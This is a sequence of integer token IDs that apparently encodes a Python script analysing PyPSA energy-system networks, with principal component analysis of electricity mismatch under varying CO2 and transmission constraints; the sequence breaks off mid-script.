1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
5564,
49,
10439,
198,
220,
220,
220,
1303,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
32028,
5270,
329,
8744,
198,
220,
220,
220,
5270,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
337,
1042,
963,
8744,
198,
220,
220,
220,
46318,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
4217,
32,
319,
46318,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
76,
1042,
963,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
2034,
437,
1988,
284,
17593,
198,
220,
220,
220,
2318,
46912,
8291,
3411,
28827,
66,
13,
33295,
7,
25641,
590,
18438,
1328,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
198,
1102,
2536,
6003,
796,
14631,
28667,
1600,
366,
11297,
1600,
366,
17,
87,
9236,
1600,
366,
19,
87,
9236,
1600,
366,
21,
87,
9236,
8973,
198,
7839,
796,
366,
15057,
286,
4217,
12059,
24198,
286,
3127,
355,
257,
2163,
286,
11478,
32315,
1,
198,
87,
18242,
796,
366,
8291,
3411,
32315,
1,
628,
198,
198,
2385,
457,
2578,
28827,
66,
796,
5855,
44132,
414,
337,
1042,
963,
532,
366,
1343,
2393,
58,
1065,
21912,
1415,
12962,
198,
5647,
796,
31597,
7,
5657,
46912,
8291,
3411,
28827,
66,
11,
767,
11,
29472,
62,
7645,
11,
17778,
11,
3670,
11,
2124,
18242,
11,
424,
457,
2578,
28827,
66,
11,
10369,
7857,
28,
1507,
11,
2336,
7857,
41888,
21,
11,
513,
4357,
299,
4033,
28,
19,
11,
13179,
10779,
1558,
13,
20,
11,
275,
3524,
16193,
15,
13,
20,
12095,
15,
13,
2078,
4008,
198,
7839,
10374,
8291,
3411,
28827,
66,
796,
357,
7753,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
2409,
3602,
15987,
66,
337,
1042,
963,
4943,
198,
16928,
43328,
7,
5647,
11,
3108,
11,
3670,
10374,
8291,
3411,
28827,
66,
8,
628,
220,
220,
198,
2,
34400,
438,
9794,
287,
10156,
290,
2882,
7375,
17,
41436,
6329,
1303,
628,
198,
2,
35748,
284,
3650,
37456,
3815,
198,
50033,
4264,
3890,
28827,
66,
796,
17635,
198,
50033,
31077,
28827,
66,
220,
220,
220,
220,
796,
17635,
198,
50033,
34,
709,
2743,
590,
28827,
66,
220,
220,
796,
17635,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
8220,
17,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
21,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
20,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
19,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
18,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
17,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
16,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
8973,
628,
198,
1640,
2393,
287,
29472,
62,
8220,
17,
25,
198,
220,
220,
220,
1303,
220,
22369,
6329,
42048,
34400,
24305,
2,
198,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
640,
25560,
198,
220,
220,
220,
640,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
42048,
3440,
329,
1123,
1499,
198,
220,
220,
220,
3440,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
12347,
31392,
5270,
198,
220,
220,
220,
5270,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
220,
220,
220,
5270,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
1550,
14640,
2344,
5270,
198,
220,
220,
220,
5270,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3242,
14640,
2344,
5270,
198,
220,
220,
220,
1303,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
5564,
49,
10439,
198,
220,
220,
220,
1303,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
32028,
5270,
329,
8744,
198,
220,
220,
220,
5270,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
337,
1042,
963,
8744,
198,
220,
220,
220,
46318,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
4217,
32,
319,
46318,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
76,
1042,
963,
28827,
66,
8,
628,
220,
220,
220,
1303,
2345,
3890,
15987,
66,
198,
220,
220,
220,
288,
1980,
3103,
28827,
66,
796,
2345,
3890,
7,
27349,
11,
366,
11129,
66,
4943,
198,
220,
220,
220,
37456,
5216,
12609,
3103,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
3103,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
4264,
3890,
28827,
66,
13,
33295,
7,
50033,
5216,
12609,
3103,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
18261,
15987,
66,
198,
220,
220,
220,
288,
1980,
4965,
28827,
66,
796,
15987,
66,
31077,
7,
27349,
11,
17821,
8,
198,
220,
220,
220,
37456,
5216,
12609,
4965,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
31077,
28827,
66,
13,
33295,
7,
50033,
5216,
12609,
4965,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
39751,
2743,
590,
15987,
66,
198,
220,
220,
220,
39849,
46912,
796,
39751,
11395,
8645,
1352,
7,
67,
1980,
3103,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
837,
6407,
11,
2593,
34184,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
34,
709,
2743,
590,
28827,
66,
13,
33295,
7,
66,
709,
46912,
13,
51,
8,
220,
220,
220,
220,
198,
198,
2,
16626,
198,
6738,
5499,
62,
7753,
1330,
1635,
220,
220,
198,
2,
2276,
2846,
198,
6978,
4264,
571,
1009,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
2345,
3890,
6852,
1,
198,
6978,
31077,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
18261,
6852,
1,
198,
6978,
34,
709,
2743,
590,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
39751,
2743,
590,
6852,
1,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
10156,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
4264,
3890,
28827,
66,
7,
50033,
4264,
3890,
28827,
66,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
542,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
4264,
571,
1009,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
10156,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
4264,
3890,
28827,
66,
7,
50033,
4264,
3890,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
542,
598,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
4264,
571,
1009,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
31077,
28827,
66,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
2882,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
31077,
28827,
66,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
2882,
598,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
44829,
590,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
31077,
34,
709,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
39849,
2882,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
44829,
590,
2882,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
31077,
34,
709,
7,
50033,
31077,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
39849,
2882,
598,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
31077,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
44829,
590,
6,
198,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
1022,
46318,
290,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
34,
709,
2743,
590,
7,
50033,
34,
709,
2743,
590,
28827,
66,
11,
2824,
15156,
907,
28,
17821,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
44829,
590,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
34,
709,
2743,
590,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
44829,
590,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
44829,
590,
1022,
46318,
290,
2882,
355,
257,
2163,
286,
7375,
17,
32315,
1,
198,
5647,
796,
9794,
34,
709,
2743,
590,
7,
50033,
34,
709,
2743,
590,
28827,
66,
11,
2824,
15156,
907,
28,
17821,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
44829,
590,
598,
357,
8220,
17,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
34,
709,
2743,
590,
11,
3613,
19160,
8,
628,
198,
2,
16626,
198,
2,
34400,
438,
9794,
287,
10156,
290,
2882,
11478,
41436,
6329,
1303,
198,
198,
2,
35748,
284,
3650,
37456,
3815,
198,
50033,
4264,
3890,
28827,
66,
796,
17635,
198,
50033,
31077,
28827,
66,
220,
220,
220,
220,
796,
17635,
198,
50033,
34,
709,
2743,
590,
28827,
66,
220,
220,
796,
17635,
198,
198,
2,
6530,
286,
2393,
357,
27238,
307,
287,
3376,
9483,
4067,
8,
198,
34345,
62,
7645,
796,
14631,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
3312,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
11623,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
1495,
62,
15,
13,
2713,
13,
71,
20,
1600,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
366,
7353,
27349,
12,
11129,
66,
62,
8807,
62,
15,
13,
22318,
62,
15,
13,
2713,
13,
71,
20,
8973,
198,
198,
1640,
2393,
287,
29472,
62,
7645,
25,
198,
220,
220,
220,
1303,
220,
22369,
6329,
42048,
34400,
24305,
2,
198,
220,
220,
220,
1303,
7311,
198,
220,
220,
220,
3127,
796,
12972,
862,
64,
13,
26245,
7,
34945,
1343,
2393,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
262,
3891,
286,
262,
1366,
198,
220,
220,
220,
1366,
36690,
796,
3127,
13,
65,
2664,
13,
9630,
13,
2536,
13,
48369,
7,
15,
11,
17,
737,
34642,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3497,
640,
25560,
198,
220,
220,
220,
640,
15732,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
13,
9630,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
42048,
3440,
329,
1123,
1499,
198,
220,
220,
220,
3440,
28827,
66,
796,
3127,
13,
46030,
62,
83,
13,
79,
62,
2617,
58,
7890,
36690,
60,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
12347,
31392,
5270,
198,
220,
220,
220,
5270,
38825,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
58,
7890,
36690,
1343,
366,
6591,
8973,
198,
220,
220,
220,
5270,
38825,
13,
28665,
82,
796,
5270,
38825,
13,
28665,
82,
13,
2536,
13,
48369,
7,
15,
11,
17,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
1550,
14640,
2344,
5270,
198,
220,
220,
220,
5270,
2202,
7972,
796,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
261,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
3242,
14640,
2344,
5270,
198,
220,
220,
220,
1303,
4362,
572,
7972,
318,
691,
329,
2310,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
572,
7972,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
9362,
7972,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
9362,
7972,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
2364,
7972,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
9362,
7972,
796,
5270,
9362,
7972,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
5564,
49,
10439,
198,
220,
220,
220,
1303,
4362,
5564,
49,
318,
691,
329,
2681,
2678,
11,
3224,
5050,
423,
284,
307,
9177,
284,
787,
340,
379,
10083,
1899,
2124,
1542,
17593,
198,
220,
220,
220,
1303,
13610,
6565,
7177,
286,
10083,
1899,
2124,
1542,
11,
751,
262,
5564,
49,
5270,
290,
4781,
705,
26705,
45,
6,
3815,
13,
198,
220,
220,
220,
5270,
15450,
49,
796,
279,
67,
13,
6601,
19778,
7,
37659,
13,
9107,
418,
26933,
5774,
1899,
11,
1270,
46570,
9630,
28,
2435,
15732,
11,
15180,
28,
7890,
36690,
8,
198,
220,
220,
220,
5270,
15450,
49,
15853,
3127,
13,
8612,
2024,
62,
83,
13,
79,
30109,
19315,
329,
1499,
287,
3127,
13,
8612,
2024,
62,
83,
13,
79,
13,
28665,
82,
611,
366,
1472,
1,
287,
1499,
60,
4083,
8094,
1525,
7,
27349,
13,
8612,
2024,
13,
10885,
13,
2536,
13,
48369,
7,
15,
11,
17,
828,
22704,
28,
16,
737,
16345,
3419,
198,
220,
220,
220,
5270,
15450,
49,
796,
5270,
15450,
49,
13,
33491,
7,
37659,
13,
12647,
11,
15,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
32028,
5270,
329,
8744,
198,
220,
220,
220,
5270,
28827,
66,
796,
5270,
38825,
1343,
5270,
2202,
7972,
1343,
5270,
9362,
7972,
1343,
5270,
15450,
49,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
337,
1042,
963,
8744,
198,
220,
220,
220,
46318,
28827,
66,
796,
5270,
28827,
66,
532,
3440,
28827,
66,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
4217,
32,
319,
46318,
329,
8744,
198,
220,
220,
220,
304,
9324,
40161,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
11,
24198,
18438,
1328,
28827,
66,
11,
2593,
34184,
28827,
66,
11,
13368,
293,
66,
796,
4217,
32,
7,
76,
1042,
963,
28827,
66,
8,
628,
220,
220,
220,
1303,
2345,
3890,
15987,
66,
198,
220,
220,
220,
288,
1980,
3103,
28827,
66,
796,
2345,
3890,
7,
27349,
11,
366,
11129,
66,
4943,
198,
220,
220,
220,
37456,
5216,
12609,
3103,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
3103,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
4264,
3890,
28827,
66,
13,
33295,
7,
50033,
5216,
12609,
3103,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
18261,
15987,
66,
198,
220,
220,
220,
288,
1980,
4965,
28827,
66,
796,
15987,
66,
31077,
7,
27349,
11,
17821,
8,
198,
220,
220,
220,
37456,
5216,
12609,
4965,
28827,
66,
796,
1482,
11395,
8645,
1352,
7,
27237,
34184,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
11,
304,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
31077,
28827,
66,
13,
33295,
7,
50033,
5216,
12609,
4965,
28827,
66,
8,
198,
220,
220,
220,
220,
198,
220,
220,
220,
1303,
39751,
2743,
590,
15987,
66,
198,
220,
220,
220,
39849,
46912,
796,
39751,
11395,
8645,
1352,
7,
67,
1980,
3103,
28827,
66,
11,
288,
1980,
4965,
28827,
66,
837,
6407,
11,
2593,
34184,
28827,
66,
11,
68,
9324,
53,
478,
669,
28827,
66,
8,
198,
220,
220,
220,
37456,
34,
709,
2743,
590,
28827,
66,
13,
33295,
7,
66,
709,
46912,
13,
51,
8,
220,
220,
220,
198,
220,
220,
220,
220,
198,
2,
2276,
2846,
198,
6978,
4264,
571,
1009,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
2345,
3890,
6852,
1,
198,
6978,
31077,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
18261,
6852,
1,
198,
6978,
34,
709,
2743,
590,
796,
3785,
15235,
1343,
366,
44,
1042,
963,
6852,
19400,
287,
39751,
2743,
590,
6852,
1,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
10156,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
4264,
3890,
28827,
66,
7,
50033,
4264,
3890,
28827,
66,
11,
23064,
28,
17821,
11,
4217,
28,
17,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
542,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
4264,
571,
1009,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
10156,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
4264,
3890,
28827,
66,
7,
50033,
4264,
3890,
28827,
66,
11,
23064,
28,
25101,
11,
4217,
28,
21,
8,
1303,
5647,
7839,
198,
21928,
19160,
796,
2393,
58,
1065,
21912,
1415,
60,
1343,
366,
532,
9794,
287,
9766,
66,
542,
598,
357,
7645,
16725,
198,
16928,
43328,
7,
5647,
11,
3108,
4264,
571,
1009,
11,
3613,
19160,
8,
198,
198,
2,
28114,
1487,
287,
9766,
66,
10156,
198,
5647,
7839,
796,
366,
19400,
287,
8744,
2882,
355,
257,
2163,
286,
11478,
32315,
1,
198,
5647,
796,
9794,
31077,
28827,
66,
7,
50033,
31077,
28827,
66,
11,
